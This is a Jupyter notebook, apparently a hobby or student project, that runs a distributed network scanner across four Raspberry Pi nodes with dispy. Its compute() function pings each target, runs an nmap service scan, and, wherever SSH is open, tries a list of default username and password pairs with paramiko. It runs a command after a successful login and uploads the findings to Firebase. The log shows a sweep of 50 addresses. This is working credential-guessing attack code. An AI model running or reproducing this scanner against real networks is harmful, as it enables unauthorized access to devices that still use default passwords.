Raspberry Pi Cluster Network Scanning

This notebook is intended for presentation purposes.

compute()

This is the function that runs on the individual worker nodes. For a more in-depth look, see SingleDemo.ipynb.

In [1]:
def compute(hostname):
    import os
    # Check whether the host answers a single ping (one-second deadline).
    if os.system("ping -c 1 -w 1 " + hostname) == 0:
        valid = "alive"
        from libnmap.process import NmapProcess
        from libnmap.parser import NmapParser
        # Run an nmap service/version scan (-sV) against the live host and parse the output.
        nmproc = NmapProcess(hostname, "-sV")
        rc = nmproc.run()
        parsed = NmapParser.parse(nmproc.stdout)
        host = parsed.hosts[0]
        services = []
        status = "Unknown"
        cracked = False
        for serv in host.services:
            services.append(str(serv.port) + "/" + str(serv.service))
            if serv.port == 22:
                # SSH is open: try a short list of common default credentials.
                import paramiko
                client = paramiko.client.SSHClient()
                client.load_system_host_keys()
                client.set_missing_host_key_policy(paramiko.WarningPolicy)
                uid_list = ["pi", "odroid", "root", "admin"]
                pwd_list = ["raspberry", "odroid", "root", "admin", "password"]
                for uid in uid_list:
                    for pwd in pwd_list:
                        if cracked:
                            break
                        try:
                            client.connect(hostname, username=uid, password=pwd)
                            stdin, stdout, stderr = client.exec_command('ls -l')
                            status = "Poor SSH Credentials"
                            print("PWNNEEDDDD!!!!")
                            cracked = True
                        except Exception:
                            print("failed to pwn")
                            status = "Unknown"
                client.close()
        # Push the scan result to Firebase, keyed by the four octets of the IP address.
        import pyrebase
        config = {
            "apiKey": "",
            "authDomain": "clusterscanner.firebaseio.com",
            "databaseURL": "https://clusterscanner.firebaseio.com/",
            "storageBucket": "clusterscanner.appspot.com"
        }
        firebase = pyrebase.initialize_app(config)
        auth = firebase.auth()
        user = auth.sign_in_with_email_and_password("[email protected]", "")
        db = firebase.database()  # reference to the database service
        hoststruct = hostname.split(".")
        data = {"hostname": hostname,
                "services": services,
                "status": status}
        results = db.child(hoststruct[0]).child(hoststruct[1]).child(
            hoststruct[2]).child(hoststruct[3]).set(data, user['idToken'])
    else:
        valid = "dead"
    return (hostname, valid)
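
Before handing compute() to the cluster, it can be sanity-checked on the client itself. The snippet below is a minimal, hypothetical smoke test (not one of the notebook's cells); it assumes libnmap, paramiko and pyrebase are installed locally, that the redacted Firebase credentials have been filled in, and that the chosen target address is one you are allowed to scan.

# Hypothetical local smoke test for compute()
target = "172.22.0.166"  # assumption: a reachable test host on the lab network
hostname, valid = compute(target)
print(hostname + " is " + valid)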

Cluster

First we import dispy, a Python framework for distributed computing.

In [2]:
import dispy

Set up the worker nodes, the cluster, and the dispy HTTP monitoring tool.

In [3]:
# Link-local addresses of the four Raspberry Pi worker nodes
workers = ['169.254.102.163', '169.254.116.199',
           '169.254.114.226', '169.254.156.34']

# Create the cluster; ip_addr is the address of this client (head) node
cluster = dispy.JobCluster(compute, nodes=workers, ip_addr='169.254.148.126')

import dispy.httpd, time
# Start dispy's built-in HTTP server so the cluster can be monitored from a browser
http_server = dispy.httpd.DispyHTTPServer(cluster)
2017-12-16 20:09:50 pycos - version 4.6.5 with epoll I/O notifier
2017-12-16 20:09:50 dispy - dispy client version: 4.8.3
2017-12-16 20:09:50 dispy - Storing fault recovery information in "_dispy_20171216200950"
2017-12-16 20:09:51 dispy - Started HTTP server at ('0.0.0.0', 8181)

We can now prepare our jobs (a range of IP addresses).

After preparing the jobs, we give the cluster two seconds to make sure everything is initialised properly, then check the status of the cluster.

In [4]:
jobs = []
test_range = []
# Build the target list: 172.22.0.150 - 172.22.0.199 (50 addresses);
# widen range(0, 1) to cover more third-octet values
for i in range(0, 1):
    for j in range(150, 200):
        test_range.append("172.22." + str(i) + "." + str(j))
print("Testing " + str(len(test_range)) + " hostnames")

time.sleep(2)
cluster.print_status()
Testing 50 hostnames

                           Node |  CPUs |    Jobs |    Sec/Job | Node Time Sec
------------------------------------------------------------------------------
 169.254.116.199 (p2)           |     1 |       0 |      0.000 |         0.000
 169.254.102.163 (p1)           |     1 |       0 |      0.000 |         0.000
 169.254.114.226 (p3)           |     1 |       0 |      0.000 |         0.000
 169.254.156.34 (p4)            |     1 |       0 |      0.000 |         0.000

Total job time: 0.000 sec, wall time: 7.525 sec, speedup: 0.000
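
The target list above is built by string concatenation; for larger sweeps the standard-library ipaddress module can do the same job. A minimal sketch (the /24 network in the second example is an assumption for illustration, not part of this notebook):

import ipaddress

# Same 50 addresses as above, built from an IPv4Address base
base = ipaddress.ip_address("172.22.0.150")
test_range = [str(base + offset) for offset in range(50)]

# Or sweep an entire subnet (assumed /24 here)
full_sweep = [str(host) for host in ipaddress.ip_network("172.22.0.0/24").hosts()]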

Showtime!

Let's set the cluster loose on our jobs.

In [5]:
start = time.time()

# Submit one job per target address
for i, address in enumerate(test_range):
    job = cluster.submit(address)
    job.id = i
    jobs.append(job)

# Collect results; calling job() blocks until that job has finished
for job in jobs:
    try:
        hostname, valid = job()  # waits for job to finish and returns results
        print(job.ip_addr + ": " + hostname + " is " + valid + ".")
    except Exception as e:
        print(str(job) + " failed: " + str(e))

end = time.time()
cluster.print_status()
http_server.shutdown()
cluster.close()

print("")
print("Total time taken = " + str(end - start))
169.254.116.199: 172.22.0.150 is dead.
169.254.102.163: 172.22.0.151 is dead.
169.254.114.226: 172.22.0.152 is dead.
169.254.156.34: 172.22.0.153 is dead.
169.254.114.226: 172.22.0.154 is dead.
169.254.102.163: 172.22.0.155 is dead.
169.254.156.34: 172.22.0.156 is dead.
169.254.116.199: 172.22.0.157 is dead.
169.254.114.226: 172.22.0.158 is dead.
169.254.156.34: 172.22.0.159 is dead.
169.254.116.199: 172.22.0.160 is dead.
169.254.102.163: 172.22.0.161 is dead.
169.254.114.226: 172.22.0.162 is dead.
169.254.156.34: 172.22.0.163 is dead.
169.254.102.163: 172.22.0.164 is dead.
169.254.116.199: 172.22.0.165 is dead.
169.254.114.226: 172.22.0.166 is alive.
169.254.156.34: 172.22.0.167 is dead.
169.254.102.163: 172.22.0.168 is dead.
169.254.116.199: 172.22.0.169 is dead.
169.254.102.163: 172.22.0.170 is dead.
169.254.156.34: 172.22.0.171 is dead.
169.254.116.199: 172.22.0.172 is dead.
169.254.102.163: 172.22.0.173 is dead.
169.254.156.34: 172.22.0.174 is dead.
169.254.116.199: 172.22.0.175 is dead.
169.254.102.163: 172.22.0.176 is dead.
169.254.156.34: 172.22.0.177 is dead.
169.254.116.199: 172.22.0.178 is dead.
169.254.102.163: 172.22.0.179 is dead.
169.254.156.34: 172.22.0.180 is dead.
169.254.116.199: 172.22.0.181 is dead.
169.254.102.163: 172.22.0.182 is dead.
169.254.156.34: 172.22.0.183 is dead.
169.254.116.199: 172.22.0.184 is dead.
169.254.102.163: 172.22.0.185 is dead.
169.254.156.34: 172.22.0.186 is dead.
169.254.116.199: 172.22.0.187 is dead.
169.254.102.163: 172.22.0.188 is dead.
169.254.156.34: 172.22.0.189 is dead.
169.254.116.199: 172.22.0.190 is dead.
169.254.102.163: 172.22.0.191 is dead.
169.254.156.34: 172.22.0.192 is dead.
169.254.116.199: 172.22.0.193 is dead.
169.254.102.163: 172.22.0.194 is dead.
169.254.116.199: 172.22.0.195 is dead.
169.254.156.34: 172.22.0.196 is dead.
169.254.102.163: 172.22.0.197 is dead.
169.254.116.199: 172.22.0.198 is dead.
169.254.156.34: 172.22.0.199 is dead.

                           Node |  CPUs |    Jobs |    Sec/Job | Node Time Sec
------------------------------------------------------------------------------
 169.254.116.199 (p2)           |     1 |      15 |      1.141 |        17.108
 169.254.102.163 (p1)           |     1 |      15 |      1.073 |        16.094
 169.254.114.226 (p3)           |     1 |       5 |      7.621 |        38.105
 169.254.156.34 (p4)            |     1 |      15 |      1.141 |        17.120

Total job time: 88.426 sec, wall time: 49.949 sec, speedup: 1.770

2017-12-16 20:10:40 dispy - HTTP server waiting for 10 seconds for client updates before quitting

Total time taken = 38.355035066604614
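
As a side note, the collection loop above blocks on each job in submission order. dispy can also invoke a callback as jobs change state, so results are printed as soon as any node finishes. The sketch below is a rough variant under the dispy 4.x API used here; the callback parameter name (renamed job_status in later releases) and the job fields should be treated as assumptions to check against the installed version.

import dispy

def print_result(job):
    # Called by dispy whenever a job changes status; report only finished jobs.
    if job.status == dispy.DispyJob.Finished:
        hostname, valid = job.result
        print(job.ip_addr + ": " + hostname + " is " + valid + ".")

# Assumed parameter name for dispy 4.x
cluster = dispy.JobCluster(compute, nodes=workers,
                           ip_addr='169.254.148.126', callback=print_result)

for address in test_range:
    cluster.submit(address)

cluster.wait()   # block until all submitted jobs have finished
cluster.close()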